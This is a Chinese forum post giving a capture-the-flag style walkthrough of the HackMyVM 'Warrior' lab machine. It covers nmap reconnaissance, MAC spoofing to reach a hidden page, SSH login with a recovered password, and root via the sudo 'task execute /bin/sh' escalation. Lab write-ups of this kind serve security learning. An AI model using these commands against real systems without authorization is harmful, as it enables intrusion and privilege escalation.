电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 2384 人浏览分享

hackmyvm系列2——Warrior

[复制链接]
2384 0
本帖最后由 zhaorong 于 2022-12-15 15:36 编辑

我真的很喜欢自己 一个人,没牵挂 ,没辜负,没感动,更没失望。慢慢的我也喜欢上了我现在的生活
没有惊喜,也没有意外。


前言:

hackmyvm打靶系列文章。

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

所有环境均为在线下载的靶场,且在本机进行学习。

一、信息收集

netdiscover -r 192.168.56.0/24

nmap -sV -Pn -sC 192.168.56.127

QQ截图20221215152633.png

对nmap脚本扫描出的目录文件进行访问,进行尝试ssh的登录但是失败了

http://192.168.56.127/user.txt

http://192.168.56.127/secret.txt

998.png

http://192.168.56.127/internal.php,这个文件应该是需要修改自己的mac地址才可以进行访问其内容

996.png

从0~f进行尝试,最终00:00:00:00:00:af可以成功访问,之后拿到了一个密码:Zurviv0r1

将其尝试作为loco的ssh密码但是还是失败了,但是在上述网页中,还有一个用户名bro

二、登录SSH

899.png

用户名:bro

密码:Zurviv0r1

成功登入ssh

898.png

三、权限提升

查找有权限的suid,find / -perm -u=s -type f 2>/dev/null

896.png

(这里sudo会提示不存在,需要运行的时间加上其路径才可以)

/usr/sbin/sudo -l

9.png

可以利用task进行提权

8.png

/usr/sbin/sudo /usr/bin/task execute /bin/sh

7.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.